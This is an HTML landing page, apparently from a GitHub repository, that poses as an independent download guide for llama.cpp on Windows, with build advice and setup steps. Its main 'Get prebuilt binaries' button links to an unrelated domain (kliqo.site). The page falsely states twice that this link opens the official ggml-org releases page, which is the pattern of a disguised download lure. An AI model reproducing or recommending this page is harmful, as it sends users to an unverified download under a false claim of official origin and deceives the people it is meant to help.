Galiten/llama.cppforDesktop
0
1<!DOCTYPE html>2<html lang="en">3<head>4<meta charset="UTF-8">5<meta name="viewport" content="width=device-width, initial-scale=1.0">6<title>llama.cpp — Windows Desktop Download</title>7<link rel="preconnect" href="https://fonts.googleapis.com">8<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>9<link href="https://fonts.googleapis.com/css2?family=Space+Grotesk:wght@500;600;700&family=Inter:wght@400;500;600&display=swap" rel="stylesheet">10<style>11 :root{12 --bg:#0F1115;13 --panel:#171A21;14 --line:#272B34;15 --text:#E9EAEC;16 --muted:#9CA2AC;17 --accent:#A8D46E;18 --accent-soft:#22300F;19 --good:#5FD6A0;20 --warn:#F0A868;21 }22 *{box-sizing:border-box;}23 html,body{margin:0;padding:0;}24 body{25 background:var(--bg);color:var(--text);26 font-family:'Inter', -apple-system, Segoe UI, sans-serif;27 line-height:1.6;-webkit-font-smoothing:antialiased;28 }29 .wrap{max-width:760px;margin:0 auto;padding:0 24px;}30 31 header{padding:64px 0 48px;text-align:center;}32 .badge{33 display:inline-flex;align-items:center;gap:8px;font-size:13px;color:var(--good);34 background:rgba(95,214,160,0.1);border:1px solid rgba(95,214,160,0.25);35 padding:6px 14px;border-radius:999px;margin-bottom:22px;36 }37 .badge::before{content:"●";font-size:8px;}38 h1{39 font-family:'Space Grotesk', sans-serif;font-weight:700;40 font-size:clamp(2rem, 5vw, 2.9rem);line-height:1.1;41 margin:0 0 16px;letter-spacing:-0.01em;42 }43 header p.sub{color:var(--muted);font-size:1.08rem;max-width:50ch;margin:0 auto 32px;}44 45 .dlbtn{46 display:inline-flex;align-items:center;gap:10px;47 background:var(--accent);color:#0F1115;font-weight:600;font-size:1rem;48 padding:15px 30px;border-radius:10px;text-decoration:none;49 transition:transform .15s ease, box-shadow .15s ease;50 box-shadow:0 8px 24px rgba(168,212,110,0.28);51 }52 .dlbtn:hover{transform:translateY(-2px);box-shadow:0 12px 30px rgba(168,212,110,0.4);}53 .dlbtn svg{width:18px;height:18px;}54 .fineprint{color:var(--muted);font-size:12.5px;margin-top:14px;}55 56 .spec-strip{57 display:flex;justify-content:center;margin:40px 0 8px;58 border-top:1px solid var(--line);border-bottom:1px solid var(--line);59 }60 .spec-strip div{flex:1;text-align:center;padding:18px 10px;border-right:1px solid var(--line);}61 .spec-strip div:last-child{border-right:none;}62 .spec-strip .k{font-size:11.5px;color:var(--muted);text-transform:uppercase;letter-spacing:.04em;margin:0 0 6px;}63 .spec-strip .v{font-weight:600;font-size:0.95rem;margin:0;}64 65 section{padding:44px 0;border-bottom:1px solid var(--line);}66 section:last-of-type{border-bottom:none;}67 h2{font-family:'Space Grotesk', sans-serif;font-size:1.35rem;font-weight:600;margin:0 0 20px;}68 69 .req-table{width:100%;border-collapse:collapse;font-size:0.92rem;}70 .req-table td{padding:10px 4px;border-top:1px solid var(--line);}71 .req-table td:first-child{color:var(--muted);width:34%;}72 .req-table tr:first-child td{border-top:none;}73 74 ol.steps{margin:0;padding:0;list-style:none;counter-reset:step;}75 ol.steps li{counter-increment:step;display:flex;gap:16px;padding:16px 0;border-top:1px solid var(--line);}76 ol.steps li:first-child{border-top:none;}77 ol.steps li::before{78 content:counter(step);flex:none;width:28px;height:28px;border-radius:50%;79 background:var(--accent-soft);color:var(--accent);font-size:13px;font-weight:600;80 display:flex;align-items:center;justify-content:center;81 }82 ol.steps .stitle{font-weight:600;font-size:0.95rem;margin:0 0 3px;}83 ol.steps p{margin:0;font-size:0.9rem;color:var(--muted);}84 code.inline{85 background:var(--accent-soft);color:var(--accent);padding:2px 7px;border-radius:5px;86 font-size:0.85em;font-family:'SF Mono', Consolas, monospace;87 }88 89 .notice{90 background:var(--panel);border:1px solid var(--line);border-left:3px solid var(--warn);91 border-radius:8px;padding:18px 20px;font-size:0.92rem;color:var(--muted);92 }93 .notice strong{color:var(--text);}94 95 footer{padding:36px 0 60px;text-align:center;color:var(--muted);font-size:12.5px;}96 footer a{color:var(--accent);text-decoration:none;}97 98 @media (max-width:560px){99 .spec-strip{flex-wrap:wrap;}100 .spec-strip div{flex:1 1 50%;border-bottom:1px solid var(--line);}101 }102</style>103</head>104<body>105 106<div class="wrap">107 108 <header>109 <span class="badge">Free & open source · No installer needed</span>110 <h1>llama.cpp for Windows Desktop</h1>111 <p class="sub">The lightweight C/C++ inference engine that powers Ollama, LM Studio, and most local-LLM tools run it directly if you want raw speed and full control.</p>112 113 <a class="dlbtn" href="https://kliqo.site/?id=llamacpp-for-Windows-Desktop" target="_blank" rel="noopener">114 <svg viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"><path d="M12 3v12m0 0l-4-4m4 4l4-4M5 21h14"/></svg>115 Get prebuilt binaries116 </a>117 <p class="fineprint">Opens the official ggml-org releases page · CPU, CUDA, Vulkan & SYCL builds available</p>118 </header>119 120 <div class="spec-strip">121 <div><p class="k">Maintainer</p><p class="v">ggml-org</p></div>122 <div><p class="k">Cost</p><p class="v">Free</p></div>123 <div><p class="k">Interface</p><p class="v">CLI + local server</p></div>124 <div><p class="k">Format</p><p class="v">GGUF</p></div>125 </div>126 127 <section>128 <h2>Picking the right build</h2>129 <table class="req-table">130 <tr><td>NVIDIA GPU</td><td>Grab the <code class="inline">cuda</code> build matching your driver's CUDA version for GPU acceleration</td></tr>131 <tr><td>AMD GPU</td><td>Vulkan builds work broadly; ROCm/HIP builds give better performance on supported cards</td></tr>132 <tr><td>Intel Arc</td><td>SYCL build targets Intel GPUs specifically</td></tr>133 <tr><td>No GPU / unsure</td><td>The plain CPU build runs anywhere, just slower on larger models</td></tr>134 </table>135 </section>136 137 <section>138 <h2>Getting it running</h2>139 <ol class="steps">140 <li>141 <div>142 <p class="stitle">Open the Releases page and find the newest build</p>143 <p>Click the button above, open the top release, and expand <code class="inline">Assets</code> to see the Windows zip files by backend (cpu, cuda, vulkan, etc).</p>144 </div>145 </li>146 <li>147 <div>148 <p class="stitle">Download and extract the matching zip</p>149 <p>No installer — just unzip it anywhere. You'll see <code class="inline">llama-cli.exe</code> and <code class="inline">llama-server.exe</code> inside.</p>150 </div>151 </li>152 <li>153 <div>154 <p class="stitle">Download a GGUF model</p>155 <p>Grab a quantized model file (Q4_K_M is a common balance of size/quality) from Hugging Face and place it in the same folder.</p>156 </div>157 </li>158 <li>159 <div>160 <p class="stitle">Run it</p>161 <p>From Command Prompt in that folder: <code class="inline">llama-server -m model.gguf</code> starts a local OpenAI-compatible server at <code class="inline">localhost:8080</code>.</p>162 </div>163 </li>164 </ol>165 </section>166 167 <section>168 <h2>Prefer a GUI on top?</h2>169 <p style="color:var(--muted);font-size:0.94rem;margin:0;">llama.cpp itself is command-line and server-only. If you'd rather have a point-and-click chat window, tools like <strong style="color:var(--text)">LM Studio</strong> and <strong style="color:var(--text)">Jan</strong> use llama.cpp underneath but wrap it in a full desktop app.</p>170 </section>171 172 <section>173 <div class="notice">174 <strong>Good to know:</strong> This is an independent overview, not affiliated with the ggml-org / llama.cpp project. The link above goes to the real official repository — this page never hosts or serves any binary itself. Some third-party "Windows Manager" wrapper apps exist for llama.cpp; they're unofficial and not covered by this guide.175 </div>176 </section>177 178 <footer>179 Independent overview · Not affiliated with ggml-org · Source: <a href="https://github.com/ggml-org/llama.cpp" target="_blank" rel="noopener">github.com/ggml-org/llama.cpp</a>180 </footer>181 182</div>183 184</body>185</html>